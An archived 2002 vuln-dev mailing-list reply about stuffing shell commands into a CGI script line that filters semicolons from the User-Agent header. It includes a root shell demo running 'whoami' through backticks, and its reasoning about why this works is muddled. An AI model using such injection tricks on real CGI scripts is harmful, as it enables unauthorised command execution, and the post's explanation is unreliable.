Vulnerability Development mailing list archives

Re: shell script cgi (summary?)

From: Brian Fury <brianfury () blueyonder co uk>
Date: Tue, 19 Nov 2002 06:40:28 +0000

On Mon, 18 Nov 2002, you wrote:

Thanks to everyone who replied regarding my attempts
to stuff shell commands into this line:

ua=`echo "$HTTP_USER_AGENT" | sed "s#\;##g"`


Obviously I can't speak authoratively here... I mean the ueber-skilled
team vuln-dev people who are payed to do this sort of thing may have
top-secret zero-day reasons why this might not work.... but hey it worked for
me.

[root@localhost lib]# export LAME=""whoami""""
[root@localhost lib]# `echo "$LAME" | sed "s#\;##g"`
root
[root@localhost lib]# 

wh00pz - lookz like command execution to me

In case you didn't realise - it'z the ` and ` characters around the whole
expression that allowz uz command execution....

[root@localhost lib]# echo $LAME
whoami
[root@localhost lib]# `echo $LAME`
root
[root@localhost lib]#   

BTW - it workz fine in a shell script.....

I'm sure somone has already mentioned this.... 

Best Regardz

Brian Fury

"You gonna feel the power of my move, you ready?"

Current thread:

shell script cgi c jones (Nov 14)
- Re: shell script cgi Brian Hatch (Nov 14)
  - Re: shell script cgi c jones (Nov 15)
- Re: shell script cgi Philip Rowlands (Nov 16)
  - Re: shell script cgi Nick Jacobsen (Nov 16)
    - Re: shell script cgi Ed Schmollinger (Nov 17)
  - Re: shell script cgi (summary?) c jones (Nov 18)
    - Re: shell script cgi (summary?) Brian Fury (Nov 19)
    - Re: shell script cgi (summary?) Andre Breiler (Nov 20)
    - Re: shell script cgi (summary?) Philip Rowlands (Nov 20)
    - Re: shell script cgi (summary?) Brian Hatch (Nov 19)
- Re: shell script cgi Rajko Zschiegner (Nov 16)
- Re: shell script cgi mlh (Nov 18)
- <Possible follow-ups>
- RE: shell script cgi Rajko Zschiegner (Nov 16)
  - Re: shell script cgi Brian Hatch (Nov 16)
    - Re: shell script cgi Ralf Dreibrodt (Nov 17)
  - Re: shell script cgi mlh (Nov 18)